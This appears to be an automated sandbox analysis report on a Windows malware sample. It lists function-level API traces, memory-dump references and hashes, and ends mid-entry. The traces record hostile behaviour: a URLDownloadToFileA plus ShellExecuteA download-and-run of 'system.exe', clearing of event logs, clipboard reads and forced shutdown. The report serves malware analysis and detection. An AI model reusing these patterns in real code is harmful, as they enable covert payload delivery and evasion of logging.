                                                                    • API ID: Clipboard$Global$CloseDataH_prologLockOpenUnlockstrlen
                                                                    • String ID:
                                                                    • API String ID: 934611190-0
                                                                    • Opcode ID: 5976a31b03ba9f18f11c0af247b37153e61dae78ef3d8ecbc8a77992907040de
                                                                    • Instruction ID: 32d50112ce0f58068e201b69a4405065d4eff6813b7af1f08ebd6762c0c446dc
                                                                    • Opcode Fuzzy Hash: 5976a31b03ba9f18f11c0af247b37153e61dae78ef3d8ecbc8a77992907040de
                                                                    • Instruction Fuzzy Hash: D201A77250061DABD701FBA58D89DEF776CAF05340F100036F905F6192DAB48E018665
                                                                    Function 0041200B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22filenetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • URLDownloadToFileA.URLMON(00000000,10013F98,C:\Program Files\Windows NT\system.exe,00000000,00000000), ref: 0041201D
                                                                    • ShellExecuteA.SHELL32(00000000,10013F90,C:\Program Files\Windows NT\system.exe,00000000,00000000,00000005), ref: 0041202D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DownloadExecuteFileShell
                                                                    • String ID: C:\Program Files\Windows NT\system.exe
                                                                    • API String ID: 2825088817-3774349005
                                                                    • Opcode ID: 8bf73eb6518c50b26927ebb68a85bcd77e84970b3874e1b07d45aec87177b45d
                                                                    • Instruction ID: 0d6a2648eb453b0ce98d4848acc32a75357771999e1b86e2559aea8d1fcb36bb
                                                                    • Opcode Fuzzy Hash: 8bf73eb6518c50b26927ebb68a85bcd77e84970b3874e1b07d45aec87177b45d
                                                                    • Instruction Fuzzy Hash: 3FD0C9329892A079E63196575C4DFDB8F3CCBE3F76F01402EF608A9094866444C3C1B1
                                                                    Function 022A33AB Relevance: 4.9, Strings: 3, Instructions: 1158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $9$B
                                                                    • API String ID: 0-1781792629
                                                                    • Opcode ID: f672ade51884d069c4a54aef30150efd2d19954300f8f72b609cbbf482c34c1d
                                                                    • Instruction ID: 103464f29d6001f202aede889a08756a5345d7d14b572a5bb7bdd36765da840b
                                                                    • Opcode Fuzzy Hash: f672ade51884d069c4a54aef30150efd2d19954300f8f72b609cbbf482c34c1d
                                                                    • Instruction Fuzzy Hash: 8CB27875910225CFCB24DFA8DC98BA9B7B4FF48304F1441EAE849EB695E7749A80CF50
                                                                    Function 0040EABD Relevance: 4.6, APIs: 3, Instructions: 117memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB19
                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040EB20
                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB64
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateProcessmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1874444438-0
                                                                    • Opcode ID: 6dbfd03899ba3ae6164cf4c1722507dcc2085d6c44deb96f3b2530c0f62249ab
                                                                    • Instruction ID: db4c6275b102b35ac819af81fd1a7e9ada2f6da87839288294dfd554a0a9ff74
                                                                    • Opcode Fuzzy Hash: 6dbfd03899ba3ae6164cf4c1722507dcc2085d6c44deb96f3b2530c0f62249ab
                                                                    • Instruction Fuzzy Hash: CD314F71604305BBE714DBAACD85E6B7BB8EF48754F10082AF605E7281E7B4E950CB68
                                                                    Function 0040D2C9 Relevance: 4.6, APIs: 3, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenEventLogA.ADVAPI32(00000000,10012C28), ref: 0040D323
                                                                    • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 0040D332
                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 0040D339
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$ClearCloseOpen
                                                                    • String ID:
                                                                    • API String ID: 1391105993-0
                                                                    • Opcode ID: a3796a531c2d6939b6cb66e9ecac668b55f7ec04d20b5c5025b794f63da832aa
                                                                    • Instruction ID: 83a536ee640a8c4d2cd0e35a6a73fdd5cd5d87576876f39e984368768e95af3b
                                                                    • Opcode Fuzzy Hash: a3796a531c2d6939b6cb66e9ecac668b55f7ec04d20b5c5025b794f63da832aa
                                                                    • Instruction Fuzzy Hash: E601B5B1D00659EFCB118FD4844169EBF70EB44780F904066E901FF290E738CA54CBA6
                                                                    Function 0040FB6E Relevance: 4.5, APIs: 3, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(10013D74,1000C074,00000004,0040FD4E,?,?,?), ref: 0040FB77
                                                                    • GetProcAddress.KERNEL32(00000000,10013D5C), ref: 0040FB89
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040FBAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID:
                                                                    • API String ID: 145871493-0
                                                                    • Opcode ID: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction ID: 36b1297db314b87aaea9300f960fe1d514b4e5f075a2a00539dbdff1862d12a1
                                                                    • Opcode Fuzzy Hash: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction Fuzzy Hash: AAE09232100221E6E6215B55FC59E9BBFB4EFC1B91B008039F901A2254C739D845C672
                                                                    Function 0040D25D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004122BA: CloseHandle.KERNEL32(?), ref: 0041236C
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0040D273
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseExitHandleWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 1537235944-3733053543
                                                                    • Opcode ID: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction ID: a791884de0bec06d00372dc062b64136ba0344cea476d1598949c07085dc0f0a
                                                                    • Opcode Fuzzy Hash: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction Fuzzy Hash: B1D0C93315D7207DF51923107D07FCE2385AB09721F30408FF604681D19AEA2A91419D
                                                                    Function 10005211 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 1000A26E: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A286
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000A296
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000A2A1
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000A2AC
                                                                      • Part of subcall function 1000A26E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A2B6
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1000A2C1
                                                                      • Part of subcall function 1000A26E: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1000A309
                                                                      • Part of subcall function 1000A26E: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000A311
                                                                      • Part of subcall function 1000A26E: CloseHandle.KERNEL32(?), ref: 1000A320
                                                                      • Part of subcall function 1000A26E: FreeLibrary.KERNEL32(00000000), ref: 1000A331
                                                                      • Part of subcall function 1000A26E: FreeLibrary.KERNEL32(00000000), ref: 1000A33C
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 10005227
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 3789203340-3733053543
                                                                    • Opcode ID: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction ID: 73690dc3233638d327258afaa9b1a9bd386752b740394fc78971cbfd81933e0b
                                                                    • Opcode Fuzzy Hash: 892ef83896c92b66bbebd300790db2d12b030267778912392e5e3cbf2078c85b
                                                                    • Instruction Fuzzy Hash: C1D0123B19E7203DF51953147D07F8D2384DF06A70F31415AF600290D59EA73AC1419D
                                                                    Function 025051C9 Relevance: 3.0, Strings: 2, Instructions: 542COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$L
                                                                    • API String ID: 0-22657231
                                                                    • Opcode ID: abce3128562e71d86b539df3752428e18ef82fc4898b25a37cc6d66ed8c35b62
                                                                    • Instruction ID: 758f196e8a2dddc9846ca79366adee4ec73b23d2ac62ae420bb3af2073199815
                                                                    • Opcode Fuzzy Hash: abce3128562e71d86b539df3752428e18ef82fc4898b25a37cc6d66ed8c35b62
                                                                    • Instruction Fuzzy Hash: 73325C70A017199FDB21DF65CC88B9ABBF9FF44304F5046EAD509A7290EB70AA84CF54
                                                                    Function 0040F151 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2452939696-0
                                                                    • Opcode ID: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction ID: c03d28a1dd34d89bbcc1f663290b6a9b283fe8bb38574ef75e147567b18b88f0
                                                                    • Opcode Fuzzy Hash: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction Fuzzy Hash: E6D0127180021CFBCF01EBE4DD49CCD7BB9BB08288B004460FA06E1064D771E565DBD5
                                                                    Function 025282B6 Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction ID: a0557ea235724c5b15460b4ecd091286d83cdd9444977eeef37ab512aaca2bdd
                                                                    • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction Fuzzy Hash: ED621870D012288FCB98DF99C4D4AADB7B2FF8C311F608199E9816B745C7356A16CF60
                                                                    Function 0254D745 Relevance: 1.9, Strings: 1, Instructions: 606COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P
                                                                    • API String ID: 0-3110715001
                                                                    • Opcode ID: 6e304fdd3c69d0d4c4cec106f5e179e862eecbb8531a3c8b1111759ff3e7f5a7
                                                                    • Instruction ID: 079a745f6601a0027906a544bb9e364348efa1010ac482293cb8ecf5244f3bf3
                                                                    • Opcode Fuzzy Hash: 6e304fdd3c69d0d4c4cec106f5e179e862eecbb8531a3c8b1111759ff3e7f5a7
                                                                    • Instruction Fuzzy Hash: DC425A71A01259CFDB24CF69C880BA9FBB1FF45308F1481AED949EB242DB749A85CF54
                                                                    Function 025256AF Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: f2dadd03a0f1952966ab383ee6b88dcbfe2e3d5e8c1163c45762e3bd9de8fed6
                                                                    • Instruction ID: bb4f461a16589c82c29dacdd2473dd6fc1b2bfe1e248b8d409257dffcaf46668
                                                                    • Opcode Fuzzy Hash: f2dadd03a0f1952966ab383ee6b88dcbfe2e3d5e8c1163c45762e3bd9de8fed6
                                                                    • Instruction Fuzzy Hash: F622D0706146718BDB2CCF29C080376BBE1BF46314F98885AE8868F2C5F334D54ACB68
                                                                    Function 022C82A2 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: b
                                                                    • API String ID: 0-1908338681
                                                                    • Opcode ID: 82a10ceaa1c4634aaa7c9ac6aa4f36b5893c26342636d0b8cfd96095e9313954
                                                                    • Instruction ID: 5761671caaf17cd859e86fa4a21f4afc4da46d6ae8f21de66b1b2405d30afbe0
                                                                    • Opcode Fuzzy Hash: 82a10ceaa1c4634aaa7c9ac6aa4f36b5893c26342636d0b8cfd96095e9313954
                                                                    • Instruction Fuzzy Hash: DBC19E31564701EFDB22AF90D808F2B7BB9FB84B54F618A1DF2459B1A0D7B0C580CB52
                                                                    Function 0247C289 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x$v
                                                                    • API String ID: 0-3403762548
                                                                    • Opcode ID: c2cd46c2bc34abf14b9c9846857d1b52621ba6be7dbb992bbb0e9326e92621f7
                                                                    • Instruction ID: f03ad3769f489012a685ee150124b0171cbd189bf9c20b4b956187e98ed1cd8f
                                                                    • Opcode Fuzzy Hash: c2cd46c2bc34abf14b9c9846857d1b52621ba6be7dbb992bbb0e9326e92621f7
                                                                    • Instruction Fuzzy Hash: 40E1F2B1908384DFD324CF16C491B9BBBE5BB88714F108A2FE5998B390DB719509CF96
                                                                    Function 0228CB25 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
